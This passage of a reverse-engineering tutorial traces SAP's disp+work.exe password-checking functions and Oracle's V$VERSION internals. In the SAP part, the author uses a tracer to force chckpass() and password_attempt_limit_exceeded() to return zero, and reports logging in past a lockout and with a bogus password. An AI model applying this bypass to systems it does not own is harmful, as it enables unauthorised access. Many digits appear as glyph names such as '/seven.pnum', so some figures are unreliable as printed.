Address: Reg335+304 Size: 8 bytes Index: 60498 TypeIndex: 60499
Type: unsigned char*
Flags: 90
LOCAL_VAR record
Address: Reg335+64 Size: 204 bytes Index: 60501 TypeIndex: 60502
Type: AD_RECORD
Flags: 90
LOCAL_VAR adlen
Address: Reg335+296 Size: 4 bytes Index: 60508 TypeIndex: 60509
Type: int
Flags: 90
And here is an example of some structure:
STRUCT DBSL_STMTID
Size: 120 Variables: 4 Functions: 0 Base classes: 0
MEMBER moduletype
/seven.pnumhttp://www.debuginfo.com/tools/typeinfodump.html
/two.pnum/three.pnum/two.pnum
Type: DBSL_MODULETYPE
Offset: 0 Index: 3 TypeIndex: 38653
MEMBER module
Type: wchar_t module[40]
Offset: 4 Index: 3 TypeIndex: 831
MEMBER stmtnum
Type: long
Offset: 84 Index: 3 TypeIndex: 440
MEMBER timestamp
Type: wchar_t timestamp[15]
Offset: 88 Index: 3 TypeIndex: 6612
Wow!
Another good news is: debugging calls (there are plenty of them) are very useful.
Here you can also notice ct_level global variable/eight.pnum, reflecting current trace level.
There is a lot of such debugging inclusions in disp+work.exe :
cmp cs:ct_level, 1
jl short loc_1400375DA
call DpLock
lea rcx, aDpxxtool4_c ; "dpxxtool4.c"
mov edx, 4Eh ; line
call CTrcSaveLocation
mov r8, cs:func_48
mov rcx, cs:hdl ; hdl
lea rdx, aSDpreadmemvalu ; "%s: DpReadMemValue (%d)"
mov r9d, ebx
call DpTrcErr
call DpUnlock
If current trace level is bigger or equal to threshold defined in the code here, debugging message will be written
to log files like dev_w/zero.pnum ,dev_disp , and other dev* files.
Let’s do grepping on file I got with the help of TYPEINFODUMP utility:
cat "disp+work.pdb.d" | grep FUNCTION | grep -i password
I got:
FUNCTION rcui::AgiPassword::DiagISelection
FUNCTION ssf_password_encrypt
FUNCTION ssf_password_decrypt
FUNCTION password_logon_disabled
FUNCTION dySignSkipUserPassword
FUNCTION migrate_password_history
FUNCTION password_is_initial
FUNCTION rcui::AgiPassword::IsVisible
FUNCTION password_distance_ok
FUNCTION get_password_downwards_compatibility
FUNCTION dySignUnSkipUserPassword
FUNCTION rcui::AgiPassword::GetTypeName
FUNCTION ‘rcui::AgiPassword::AgiPassword’::‘1’::dtor$2
FUNCTION ‘rcui::AgiPassword::AgiPassword’::‘1’::dtor$0
FUNCTION ‘rcui::AgiPassword::AgiPassword’::‘1’::dtor$1
FUNCTION usm_set_password
FUNCTION rcui::AgiPassword::TraceTo
FUNCTION days_since_last_password_change
FUNCTION rsecgrp_generate_random_password
FUNCTION rcui::AgiPassword::‘scalar deleting destructor’
FUNCTION password_attempt_limit_exceeded
FUNCTION handle_incorrect_password
FUNCTION ‘rcui::AgiPassword::‘scalar deleting destructor’’::‘1’::dtor$1
FUNCTION calculate_new_password_hash
FUNCTION shift_password_to_history
/eight.pnumMore about trace level: http://help.sap.com/saphelp_nwpi71/helpdata/en/46/962416a5a613e8e10000000a155369/
content.htm
/two.pnum/three.pnum/three.pnum
FUNCTION rcui::AgiPassword::GetType
FUNCTION found_password_in_history
FUNCTION ‘rcui::AgiPassword::‘scalar deleting destructor’’::‘1’::dtor$0
FUNCTION rcui::AgiObj::IsaPassword
FUNCTION password_idle_check
FUNCTION SlicHwPasswordForDay
FUNCTION rcui::AgiPassword::IsaPassword
FUNCTION rcui::AgiPassword::AgiPassword
FUNCTION delete_user_password
FUNCTION usm_set_user_password
FUNCTION Password_API
FUNCTION get_password_change_for_SSO
FUNCTION password_in_USR40
FUNCTION rsec_agrp_abap_generate_random_password
Let’s also try to search for debug messages which contain words «password» and «locked» . One of them is the
string «user was locked by subsequently failed password logon attempts» referenced in
function password_attempt_limit_exceeded() .
Other string this function I found may write to log file are: «password logon attempt will be rejected immediately
(preventing dictionary attacks)» ,«failed-logon lock: expired (but not removed due to ’read-only’ operation)» ,«failed-
logon lock: expired => removed» .
A/f_ter playing for a little with this function, I quickly noticed that the problem is exactly in it. It is called from
chckpass() function — one of the password checking functions.
First, I would like to be sure I’m at the correct point:
Run my tracer /five.pnum./zero.pnum./one.pnum:
tracer64.exe -a:disp+work.exe bpf=disp+work.exe!chckpass,args:3,unicode
PID=2236|TID=2248|(0) disp+work.exe!chckpass (0x202c770, L"Brewered1 ", 0x41)
(called from 0x1402f1060 (disp+work.exe!usrexist+0x3c0))
PID=2236|TID=2248|(0) disp+work.exe!chckpass -> 0x35
Call path is: syssigni() ->DyISigni() ->dychkusr() ->usrexist() ->chckpass() .
Number /zero.pnumx/three.pnum/five.pnum is error returning in chckpass() at that point:
.text:00000001402ED567 loc_1402ED567: ; CODE XREF: chckpass+B4
.text:00000001402ED567 mov rcx, rbx ; usr02
.text:00000001402ED56A call password_idle_check
.text:00000001402ED56F cmp eax, 33h
.text:00000001402ED572 jz loc_1402EDB4E
.text:00000001402ED578 cmp eax, 36h
.text:00000001402ED57B jz loc_1402EDB3D
.text:00000001402ED581 xor edx, edx ; usr02_readonly
.text:00000001402ED583 mov rcx, rbx ; usr02
.text:00000001402ED586 call password_attempt_limit_exceeded
.text:00000001402ED58B test al, al
.text:00000001402ED58D jz short loc_1402ED5A0
.text:00000001402ED58F mov eax, 35h
.text:00000001402ED594 add rsp, 60h
.text:00000001402ED598 pop r14
.text:00000001402ED59A pop r12
.text:00000001402ED59C pop rdi
.text:00000001402ED59D pop rsi
.text:00000001402ED59E pop rbx
.text:00000001402ED59F retn
Fine, let’s check:
tracer64.exe -a:disp+work.exe bpf=disp+work.exe!password_attempt_limit_exceeded,args:4,unicode,rt:0
PID=2744|TID=360|(0) disp+work.exe!password_attempt_limit_exceeded (0x202c770, 0, 0x257758, 0) (called from
0x1402ed58b (disp+work.exe!chckpass+0xeb))
PID=2744|TID=360|(0) disp+work.exe!password_attempt_limit_exceeded -> 1
PID=2744|TID=360|We modify return value (EAX/RAX) of this function to 0
/two.pnum/three.pnum/four.pnum
PID=2744|TID=360|(0) disp+work.exe!password_attempt_limit_exceeded (0x202c770, 0, 0, 0) (called from 0
x1402e9794 (disp+work.exe!chngpass+0xe4))
PID=2744|TID=360|(0) disp+work.exe!password_attempt_limit_exceeded -> 1
PID=2744|TID=360|We modify return value (EAX/RAX) of this function to 0
Excellent! I can successfully login now.
By the way, if I try to pretend I forgot the password, fixing chckpass() function return value at zero is enough to
bypass check:
tracer64.exe -a:disp+work.exe bpf=disp+work.exe!chckpass,args:3,unicode,rt:0
PID=2744|TID=360|(0) disp+work.exe!chckpass (0x202c770, L"bogus ", 0x41) (
called from 0x1402f1060 (disp+work.exe!usrexist+0x3c0))
PID=2744|TID=360|(0) disp+work.exe!chckpass -> 0x35
PID=2744|TID=360|We modify return value (EAX/RAX) of this function to 0
What also can be said while analyzing password_attempt_limit_exceeded() function is that at the very begin-
ning of it, this call might be seen:
lea rcx, aLoginFailed_us ; "login/failed_user_auto_unlock"
call sapgparam
test rax, rax
jz short loc_1402E19DE
movzx eax, word ptr [rax]
cmp ax, ’N’
jz short loc_1402E19D4
cmp ax, ’n’
jz short loc_1402E19D4
cmp ax, ’0’
jnz short loc_1402E19DE
Obviously, function sapgparam() used to query value of some configuration parameter. This function can be
called from /one.pnum/seven.pnum/six.pnum/eight.pnum different places. It seems, with the help of this information, we can easily find places in code,
control flow of which can be affected by specific configuration parameters.
It is really sweet. Function names are very clear, much clearer than in Oracle RDBMS. It seems, disp+work
process written in C++. It was apparently rewritten some time ago?
/seven.pnum./three.pnum Oracle RDBMS
/seven.pnum./three.pnum./one.pnum V$VERSION table in Oracle RDBMS
Oracle RDBMS /one.pnum/one.pnum./two.pnum is a huge program, main module oracle.exe contain approx. /one.pnum/two.pnum/four.pnum,/zero.pnum/zero.pnum/zero.pnum functions. For compar-
ison, Windows /seven.pnum x/eight.pnum/six.pnum kernel (ntoskrnl.exe) — approx. /one.pnum/one.pnum,/zero.pnum/zero.pnum/zero.pnum functions and Linux /three.pnum./nine.pnum./eight.pnum kernel (with default drivers
compiled) — /three.pnum/one.pnum,/zero.pnum/zero.pnum/zero.pnum functions.
Let’s start with an easy question. Where Oracle RDBMS get all this information, when we execute such simple
statement in SQL *Plus:
SQL> select * from V$VERSION;
And we’ve got:
BANNER
--------------------------------------------------------------------------------
Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - Production
PL/SQL Release 11.2.0.1.0 - Production
CORE 11.2.0.1.0 Production
TNS for 32-bit Windows: Version 11.2.0.1.0 - Production
NLSRTL Version 11.2.0.1.0 - Production
Let’s start. Where in Oracle RDBMS we may find a string V$VERSION ?
/two.pnum/three.pnum/five.pnum
As of win/three.pnum/two.pnum-version, oracle.exe file contain that string, that can be investigated easily. But we can also use
object (.o) files from Linux version of Oracle RDBMS, because, unlike win/three.pnum/two.pnum version oracle.exe , function names
(and global variables as well) are preserved there.
So,kqf.o file contain V$VERSION string. That object file is in main Oracle-library libserver11.a .
A reference to this text string we may find in kqfviw table stored in the same file, kqf.o :
Listing /seven.pnum./one.pnum: kqf.o
.rodata:0800C4A0 kqfviw dd 0Bh ; DATA XREF: kqfchk:loc_8003A6D
.rodata:0800C4A0 ; kqfgbn+34
.rodata:0800C4A4 dd offset _2__STRING_10102_0 ; "GV$WAITSTAT"
.rodata:0800C4A8 dd 4
.rodata:0800C4AC dd offset _2__STRING_10103_0 ; "NULL"
.rodata:0800C4B0 dd 3
.rodata:0800C4B4 dd 0
.rodata:0800C4B8 dd 195h
.rodata:0800C4BC dd 4
.rodata:0800C4C0 dd 0
.rodata:0800C4C4 dd 0FFFFC1CBh
.rodata:0800C4C8 dd 3
.rodata:0800C4CC dd 0
.rodata:0800C4D0 dd 0Ah
.rodata:0800C4D4 dd offset _2__STRING_10104_0 ; "V$WAITSTAT"
.rodata:0800C4D8 dd 4
.rodata:0800C4DC dd offset _2__STRING_10103_0 ; "NULL"
.rodata:0800C4E0 dd 3
.rodata:0800C4E4 dd 0
.rodata:0800C4E8 dd 4Eh
.rodata:0800C4EC dd 3
.rodata:0800C4F0 dd 0
.rodata:0800C4F4 dd 0FFFFC003h
.rodata:0800C4F8 dd 4
.rodata:0800C4FC dd 0
.rodata:0800C500 dd 5
.rodata:0800C504 dd offset _2__STRING_10105_0 ; "GV$BH"
.rodata:0800C508 dd 4
.rodata:0800C50C dd offset _2__STRING_10103_0 ; "NULL"
.rodata:0800C510 dd 3
.rodata:0800C514 dd 0
.rodata:0800C518 dd 269h
.rodata:0800C51C dd 15h
.rodata:0800C520 dd 0
.rodata:0800C524 dd 0FFFFC1EDh
.rodata:0800C528 dd 8
.rodata:0800C52C dd 0
.rodata:0800C530 dd 4
.rodata:0800C534 dd offset _2__STRING_10106_0 ; "V$BH"
.rodata:0800C538 dd 4
.rodata:0800C53C dd offset _2__STRING_10103_0 ; "NULL"
.rodata:0800C540 dd 3
.rodata:0800C544 dd 0
.rodata:0800C548 dd 0F5h
.rodata:0800C54C dd 14h
.rodata:0800C550 dd 0
.rodata:0800C554 dd 0FFFFC1EEh
.rodata:0800C558 dd 5
.rodata:0800C55C dd 0
By the way, o/f_ten, while analysing Oracle RDBMS internals, you may ask yourself, why functions and global
variable names are so weird. Probably, because Oracle RDBMS is very old product and was developed in C in
/one.pnum/nine.pnum/eight.pnum/zero.pnum-s. And that was a time when C standard guaranteed function names/variables support only up to /six.pnum characters
inclusive: «/six.pnum significant initial characters in an external identifier»/nine.pnum
Probably, the table kqfviw contain most (maybe even all) views prefixed with V$, these are fixed views , present
/nine.pnumDra/f_t ANSI C Standard (ANSI X/three.pnumJ/one.pnum/one.pnum//eight.pnum/eight.pnum-/zero.pnum/nine.pnum/zero.pnum) (May /one.pnum/three.pnum, /one.pnum/nine.pnum/eight.pnum/eight.pnum)
/two.pnum/three.pnum/six.pnum
all the time. Superficially, by noticing cyclic recurrence of data, we can easily see that each kqfviw table element
has /one.pnum/two.pnum /three.pnum/two.pnum-bit fields. It’s very simple to create a /one.pnum/two.pnum-elements structure in IDA /five.pnum and apply it to all table elements.
As of Oracle RDBMS version /one.pnum/one.pnum./two.pnum, there are /one.pnum/zero.pnum/two.pnum/three.pnum table elements, i.e., there are described /one.pnum/zero.pnum/two.pnum/three.pnum of all possible fixed
views . We will return to this number later.
As we can see, there are not much information in these numbers in fields. The very first number is always
equals to name of view (without terminating zero. This is correct for each element. But this information is not
very useful.
We also know that information about all fixed views can be retrieved from fixed view namedV$FIXED_VIEW_DEFINITION
(by the way, the information for this view is also taken from kqfviw andkqfvip tables.) By the way, there are /one.pnum/zero.pnum/two.pnum/three.pnum
elemens too.
SQL> select * from V$FIXED_VIEW_DEFINITION where view_name=’V$VERSION’;
VIEW_NAME
------------------------------
VIEW_DEFINITION
--------------------------------------------------------------------------------
V$VERSION
select BANNER from GV$VERSION where inst_id = USERENV(’Instance’)
So,V$VERSION is some kind of thunk view for another view, named GV$VERSION , which is, in turn:
SQL> select * from V$FIXED_VIEW_DEFINITION where view_name=’GV$VERSION’;
VIEW_NAME
------------------------------
VIEW_DEFINITION
--------------------------------------------------------------------------------
GV$VERSION
select inst_id, banner from x$version
Tables prefixed as X$ in Oracle RDBMS– is service tables too, undocumented, cannot be changed by user and
refreshed dynamically.
Let’s also try to search the text select BANNER from GV$VERSION where inst_id = USERENV(’Instance’)
inkqf.o file and we find it in kqfvip table:
.
Listing /seven.pnum./two.pnum: kqf.o
rodata:080185A0 kqfvip dd offset _2__STRING_11126_0 ; DATA XREF: kqfgvcn+18
.rodata:080185A0 ; kqfgvt+F
.rodata:080185A0 ; "select inst_id,decode(indx,1,’data bloc"...
.rodata:080185A4 dd offset kqfv459_c_0
.rodata:080185A8 dd 0
.rodata:080185AC dd 0
...
.rodata:08019570 dd offset _2__STRING_11378_0 ; "select BANNER from GV$VERSION where in"...
.rodata:08019574 dd offset kqfv133_c_0
.rodata:08019578 dd 0
.rodata:0801957C dd 0
.rodata:08019580 dd offset _2__STRING_11379_0 ; "select inst_id,decode(bitand(cfflg,1),0"...
.rodata:08019584 dd offset kqfv403_c_0
.rodata:08019588 dd 0
.rodata:0801958C dd 0
.rodata:08019590 dd offset _2__STRING_11380_0 ; "select STATUS , NAME, IS_RECOVERY_DEST"...
.rodata:08019594 dd offset kqfv199_c_0
The table appear to have /four.pnum fields in each element. By the way, there are /one.pnum/zero.pnum/two.pnum/three.pnum elements too. The second field
pointing to another table, containing table fields for this fixed view . As ofV$VERSION , this table contain only two
elements, first is 6and second is BANNER string (the number ( 6) is this string length) and a/f_ter, terminating element
contain 0and nullC-string:
/two.pnum/three.pnum/seven.pnum
Listing /seven.pnum./three.pnum: kqf.o
.rodata:080BBAC4 kqfv133_c_0 dd 6 ; DATA XREF: .rodata:08019574
.rodata:080BBAC8 dd offset _2__STRING_5017_0 ; "BANNER"
.rodata:080BBACC dd 0
.rodata:080BBAD0 dd offset _2__STRING_0_0
By joining data from both kqfviw andkqfvip tables, we may get SQL-statements which are executed when
user wants to query information from specific fixed view .
So I wrote an oracle tables/one.pnum/zero.pnumprogram, so to gather all this information from Oracle RDBMS for Linux object
files. ForV$VERSION , we may find this:
Listing /seven.pnum./four.pnum: Result of oracle tables
kqfviw_element.viewname: [V$VERSION] ?: 0x3 0x43 0x1 0xffffc085 0x4
kqfvip_element.statement: [select BANNER from GV$VERSION where inst_id = USERENV(’Instance’)]
kqfvip_element.params:
[BANNER]
And:
Listing /seven.pnum./five.pnum: Result of oracle tables
kqfviw_element.viewname: [GV$VERSION] ?: 0x3 0x26 0x2 0xffffc192 0x1
kqfvip_element.statement: [select inst_id, banner from x$version]
kqfvip_element.params:
[INST_ID] [BANNER]
GV$VERSION fixed view is distinct from V$VERSION in only that way that it contains one more field with instance
identifier. Anyway, we stuck at the table X$VERSION . Just like any other X$-tables, it’s undocumented, however,
we can query it:
SQL> select * from x$version;
ADDR INDX INST_ID
-------- ---------- ----------
BANNER
--------------------------------------------------------------------------------
0DBAF574 0 1
Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - Production
...
This table has additional fields like ADDR andINDX .
While scrolling kqf.o in IDA /five.pnum we may spot another table containing pointer to X$VERSION string, this is kqftab :
Listing /seven.pnum./six.pnum: kqf.o
.rodata:0803CAC0 dd 9 ; element number 0x1f6
.rodata:0803CAC4 dd offset _2__STRING_13113_0 ; "X$VERSION"
.rodata:0803CAC8 dd 4
.rodata:0803CACC dd offset _2__STRING_13114_0 ; "kqvt"
.rodata:0803CAD0 dd 4
.rodata:0803CAD4 dd 4
.rodata:0803CAD8 dd 0
.rodata:0803CADC dd 4
.rodata:0803CAE0 dd 0Ch
.rodata:0803CAE4 dd 0FFFFC075h
.rodata:0803CAE8 dd 3
.rodata:0803CAEC dd 0
.rodata:0803CAF0 dd 7
.rodata:0803CAF4 dd offset _2__STRING_13115_0 ; "X$KQFSZ"
.rodata:0803CAF8 dd 5
.rodata:0803CAFC dd offset _2__STRING_13116_0 ; "kqfsz"
.rodata:0803CB00 dd 1
/one.pnum/zero.pnumhttp://yurichev.com/oracle_tables.html
/two.pnum/three.pnum/eight.pnum
.rodata:0803CB04 dd 38h
.rodata:0803CB08 dd 0
.rodata:0803CB0C dd 7
.rodata:0803CB10 dd 0
.rodata:0803CB14 dd 0FFFFC09Dh
.rodata:0803CB18 dd 2
.rodata:0803CB1C dd 0
There are a lot of references to X$-table names, apparently, to all Oracle RDBMS /one.pnum/one.pnum./two.pnum X$-tables. But again, we
have not enough information. I have no idea, what kqvt string mean. kqprefix may mean kernal and query .v,
apparently, mean version andt—type? Frankly speaking, I don’t know.
The table named similarly can be found in kqf.o :
Listing /seven.pnum./seven.pnum: kqf.o
.rodata:0808C360 kqvt_c_0 kqftap_param <4, offset _2__STRING_19_0, 917h, 0, 0, 0, 4, 0, 0>
.rodata:0808C360 ; DATA XREF: .rodata:08042680
.rodata:0808C360 ; "ADDR"
.rodata:0808C384 kqftap_param <4, offset _2__STRING_20_0, 0B02h, 0, 0, 0, 4, 0, 0> ; "INDX"
.rodata:0808C3A8 kqftap_param <7, offset _2__STRING_21_0, 0B02h, 0, 0, 0, 4, 0, 0> ; "
INST_ID"
.rodata:0808C3CC kqftap_param <6, offset _2__STRING_5017_0, 601h, 0, 0, 0, 50h, 0, 0> ; "
BANNER"
.rodata:0808C3F0 kqftap_param <0, offset _2__STRING_0_0, 0, 0, 0, 0, 0, 0, 0>
It contain information about all fields in the X$VERSION table. The only reference to this table present in kqftap
table:
Listing /seven.pnum./eight.pnum: kqf.o
.rodata:08042680 kqftap_element <0, offset kqvt_c_0, offset kqvrow, 0> ; element 0x1f6
It’s interesting that this element here is 0x1f6th(/five.pnum/zero.pnum/two.pnumnd), just as a pointer to X$VERSION string inkqftab table.
Probably, kqftap andkqftab tables are complement each other, just like kqfvip andkqfviw . We also see a
pointer to kqvrow() function. Something useful at last!
So I added these tables to my oracle tables/one.pnum/one.pnumutility too. For X$VERSION I’ve got:
Listing /seven.pnum./nine.pnum: Result of oracle tables
kqftab_element.name: [X$VERSION] ?: [kqvt] 0x4 0x4 0x4 0xc 0xffffc075 0x3
kqftap_param.name=[ADDR] ?: 0x917 0x0 0x0 0x0 0x4 0x0 0x0
kqftap_param.name=[INDX] ?: 0xb02 0x0 0x0 0x0 0x4 0x0 0x0
kqftap_param.name=[INST_ID] ?: 0xb02 0x0 0x0 0x0 0x4 0x0 0x0
kqftap_param.name=[BANNER] ?: 0x601 0x0 0x0 0x0 0x50 0x0 0x0
kqftap_element.fn1=kqvrow
kqftap_element.fn2=NULL
Using tracer /five.pnum./zero.pnum./one.pnum, it’s easy to check that this function called /six.pnum times in row (from the qerfxFetch() function)
while querying X$VERSION table.
Let’s run tracer /five.pnum./zero.pnum./one.pnum inccmode (it will comment each executed instruction):
tracer -a:oracle.exe bpf=oracle.exe!_kqvrow,trace:cc
_kqvrow_ proc near
var_7C = byte ptr -7Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
Dest = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
/one.pnum/one.pnumhttp://yurichev.com/oracle_tables.html
/two.pnum/three.pnum/nine.pnum
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
; FUNCTION CHUNK AT .text1:056C11A0 SIZE 00000049 BYTES
push ebp
mov ebp, esp
sub esp, 7Ch
mov eax, [ebp+arg_14] ; [EBP+1Ch]=1
mov ecx, TlsIndex ; [69AEB08h]=0
mov edx, large fs:2Ch
mov edx, [edx+ecx*4] ; [EDX+ECX*4]=0xc98c938
cmp eax, 2 ; EAX=1
mov eax, [ebp+arg_8] ; [EBP+10h]=0xcdfe554
jz loc_2CE1288
mov ecx, [eax] ; [EAX]=0..5
mov [ebp+var_4], edi ; EDI=0xc98c938
loc_2CE10F6: ; CODE XREF: _kqvrow_+10A
; _kqvrow_+1A9
cmp ecx, 5 ; ECX=0..5
ja loc_56C11C7
mov edi, [ebp+arg_18] ; [EBP+20h]=0
mov [ebp+var_14], edx ; EDX=0xc98c938
mov [ebp+var_8], ebx ; EBX=0
mov ebx, eax ; EAX=0xcdfe554
mov [ebp+var_C], esi ; ESI=0xcdfe248
loc_2CE110D: ; CODE XREF: _kqvrow_+29E00E6
mov edx, ds:off_628B09C[ecx*4] ; [ECX*4+628B09Ch]=0x2ce1116, 0x2ce11ac, 0x2ce11db, 0
x2ce11f6, 0x2ce1236, 0x2ce127a
jmp edx ; EDX=0x2ce1116, 0x2ce11ac, 0x2ce11db, 0x2ce11f6, 0x2ce1236, 0
x2ce127a
; ---------------------------------------------------------------------------
loc_2CE1116: ; DATA XREF: .rdata:off_628B09C
push offset aXKqvvsnBuffer ; "x$kqvvsn buffer"
mov ecx, [ebp+arg_C] ; [EBP+14h]=0x8a172b4
xor edx, edx
mov esi, [ebp+var_14] ; [EBP-14h]=0xc98c938
push edx ; EDX=0
push edx ; EDX=0
push 50h
push ecx ; ECX=0x8a172b4
push dword ptr [esi+10494h] ; [ESI+10494h]=0xc98cd58
call _kghalf ; tracing nested maximum level (1) reached, skipping this CALL
mov esi, ds:__imp__vsnnum ; [59771A8h]=0x61bc49e0
mov [ebp+Dest], eax ; EAX=0xce2ffb0
mov [ebx+8], eax ; EAX=0xce2ffb0
mov [ebx+4], eax ; EAX=0xce2ffb0
mov edi, [esi] ; [ESI]=0xb200100
mov esi, ds:__imp__vsnstr ; [597D6D4h]=0x65852148, "- Production"
push esi ; ESI=0x65852148, "- Production"
mov ebx, edi ; EDI=0xb200100
shr ebx, 18h ; EBX=0xb200100
mov ecx, edi ; EDI=0xb200100
shr ecx, 14h ; ECX=0xb200100
and ecx, 0Fh ; ECX=0xb2
mov edx, edi ; EDI=0xb200100
shr edx, 0Ch ; EDX=0xb200100
movzx edx, dl ; DL=0
mov eax, edi ; EDI=0xb200100
shr eax, 8 ; EAX=0xb200100
and eax, 0Fh ; EAX=0xb2001
and edi, 0FFh ; EDI=0xb200100
push edi ; EDI=0
/two.pnum/four.pnum/zero.pnum
mov edi, [ebp+arg_18] ; [EBP+20h]=0
push eax ; EAX=1
mov eax, ds:__imp__vsnban ; [597D6D8h]=0x65852100, "Oracle Database 11g Enterprise
Edition Release %d.%d.%d.%d.%d %s"
push edx ; EDX=0
push ecx ; ECX=2
push ebx ; EBX=0xb
mov ebx, [ebp+arg_8] ; [EBP+10h]=0xcdfe554
push eax ; EAX=0x65852100, "Oracle Database 11g Enterprise Edition Release %d
.%d.%d.%d.%d %s"
mov eax, [ebp+Dest] ; [EBP-10h]=0xce2ffb0
push eax ; EAX=0xce2ffb0
call ds:__imp__sprintf ; op1=MSVCR80.dll!sprintf tracing nested maximum level (1) reached
, skipping this CALL
add esp, 38h
mov dword ptr [ebx], 1
loc_2CE1192: ; CODE XREF: _kqvrow_+FB
; _kqvrow_+128 ...
test edi, edi ; EDI=0
jnz __VInfreq__kqvrow
mov esi, [ebp+var_C] ; [EBP-0Ch]=0xcdfe248
mov edi, [ebp+var_4] ; [EBP-4]=0xc98c938
mov eax, ebx ; EBX=0xcdfe554
mov ebx, [ebp+var_8] ; [EBP-8]=0
lea eax, [eax+4] ; [EAX+4]=0xce2ffb0, "NLSRTL Version 11.2.0.1.0 - Production", "
Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - Production", "PL/SQL Release 11.2.0.1.0 -
Production", "TNS for 32-bit Windows: Version 11.2.0.1.0 - Production"
loc_2CE11A8: ; CODE XREF: _kqvrow_+29E00F6
mov esp, ebp
pop ebp
retn ; EAX=0xcdfe558
; ---------------------------------------------------------------------------
loc_2CE11AC: ; DATA XREF: .rdata:0628B0A0
mov edx, [ebx+8] ; [EBX+8]=0xce2ffb0, "Oracle Database 11g Enterprise Edition Release
11.2.0.1.0 - Production"
mov dword ptr [ebx], 2
mov [ebx+4], edx ; EDX=0xce2ffb0, "Oracle Database 11g Enterprise Edition Release
11.2.0.1.0 - Production"
push edx ; EDX=0xce2ffb0, "Oracle Database 11g Enterprise Edition Release
11.2.0.1.0 - Production"
call _kkxvsn ; tracing nested maximum level (1) reached, skipping this CALL
pop ecx
mov edx, [ebx+4] ; [EBX+4]=0xce2ffb0, "PL/SQL Release 11.2.0.1.0 - Production"
movzx ecx, byte ptr [edx] ; [EDX]=0x50
test ecx, ecx ; ECX=0x50
jnz short loc_2CE1192
mov edx, [ebp+var_14]
mov esi, [ebp+var_C]
mov eax, ebx
mov ebx, [ebp+var_8]
mov ecx, [eax]
jmp loc_2CE10F6
; ---------------------------------------------------------------------------
loc_2CE11DB: ; DATA XREF: .rdata:0628B0A4
push 0
push 50h
mov edx, [ebx+8] ; [EBX+8]=0xce2ffb0, "PL/SQL Release 11.2.0.1.0 - Production"
mov [ebx+4], edx ; EDX=0xce2ffb0, "PL/SQL Release 11.2.0.1.0 - Production"
push edx ; EDX=0xce2ffb0, "PL/SQL Release 11.2.0.1.0 - Production"
call _lmxver ; tracing nested maximum level (1) reached, skipping this CALL
add esp, 0Ch
mov dword ptr [ebx], 3
/two.pnum/four.pnum/one.pnum
jmp short loc_2CE1192
; ---------------------------------------------------------------------------
loc_2CE11F6: ; DATA XREF: .rdata:0628B0A8
mov edx, [ebx+8] ; [EBX+8]=0xce2ffb0
mov [ebp+var_18], 50h
mov [ebx+4], edx ; EDX=0xce2ffb0
push 0
call _npinli ; tracing nested maximum level (1) reached, skipping this CALL
pop ecx
test eax, eax ; EAX=0
jnz loc_56C11DA
mov ecx, [ebp+var_14] ; [EBP-14h]=0xc98c938
lea edx, [ebp+var_18] ; [EBP-18h]=0x50
push edx ; EDX=0xd76c93c
push dword ptr [ebx+8] ; [EBX+8]=0xce2ffb0
push dword ptr [ecx+13278h] ; [ECX+13278h]=0xacce190
call _nrtnsvrs ; tracing nested maximum level (1) reached, skipping this CALL
add esp, 0Ch
loc_2CE122B: ; CODE XREF: _kqvrow_+29E0118
mov dword ptr [ebx], 4
jmp loc_2CE1192
; ---------------------------------------------------------------------------
loc_2CE1236: ; DATA XREF: .rdata:0628B0AC
lea edx, [ebp+var_7C] ; [EBP-7Ch]=1
push edx ; EDX=0xd76c8d8
push 0
mov esi, [ebx+8] ; [EBX+8]=0xce2ffb0, "TNS for 32-bit Windows: Version 11.2.0.1.0 -
Production"
mov [ebx+4], esi ; ESI=0xce2ffb0, "TNS for 32-bit Windows: Version 11.2.0.1.0 -
Production"
mov ecx, 50h
mov [ebp+var_18], ecx ; ECX=0x50
push ecx ; ECX=0x50
push esi ; ESI=0xce2ffb0, "TNS for 32-bit Windows: Version 11.2.0.1.0 -
Production"
call _lxvers ; tracing nested maximum level (1) reached, skipping this CALL
add esp, 10h
mov edx, [ebp+var_18] ; [EBP-18h]=0x50
mov dword ptr [ebx], 5
test edx, edx ; EDX=0x50
jnz loc_2CE1192
mov edx, [ebp+var_14]
mov esi, [ebp+var_C]
mov eax, ebx
mov ebx, [ebp+var_8]
mov ecx, 5
jmp loc_2CE10F6
; ---------------------------------------------------------------------------
loc_2CE127A: ; DATA XREF: .rdata:0628B0B0
mov edx, [ebp+var_14] ; [EBP-14h]=0xc98c938
mov esi, [ebp+var_C] ; [EBP-0Ch]=0xcdfe248
mov edi, [ebp+var_4] ; [EBP-4]=0xc98c938
mov eax, ebx ; EBX=0xcdfe554
mov ebx, [ebp+var_8] ; [EBP-8]=0
loc_2CE1288: ; CODE XREF: _kqvrow_+1F
mov eax, [eax+8] ; [EAX+8]=0xce2ffb0, "NLSRTL Version 11.2.0.1.0 - Production"
test eax, eax ; EAX=0xce2ffb0, "NLSRTL Version 11.2.0.1.0 - Production"
jz short loc_2CE12A7
push offset aXKqvvsnBuffer ; "x$kqvvsn buffer"
push eax ; EAX=0xce2ffb0, "NLSRTL Version 11.2.0.1.0 - Production"
mov eax, [ebp+arg_C] ; [EBP+14h]=0x8a172b4
/two.pnum/four.pnum/two.pnum
push eax ; EAX=0x8a172b4
push dword ptr [edx+10494h] ; [EDX+10494h]=0xc98cd58
call _kghfrf ; tracing nested maximum level (1) reached, skipping this CALL
add esp, 10h
loc_2CE12A7: ; CODE XREF: _kqvrow_+1C1
xor eax, eax
mov esp, ebp
pop ebp
retn ; EAX=0
_kqvrow_ endp
Now it’s easy to see that row number is passed from outside of function. The function returning the string
constructing it as follows:
String /one.pnum Usingvsnstr ,vsnnum ,vsnban global variables. Calling sprintf() .
String /two.pnum Callingkkxvsn() .
String /three.pnum Callinglmxver() .
String /four.pnum Callingnpinli() ,nrtnsvrs() .
String /five.pnum Callinglxvers() .
That’s how corresponding functions are called for determining each module’s version.
/seven.pnum./three.pnum./two.pnum X$KSMLRU table in Oracle RDBMS
There is a mention of some special table in the Diagnosing and Resolving Error ORA-/zero.pnum/four.pnum/zero.pnum/three.pnum/one.pnum on the Shared Pool or
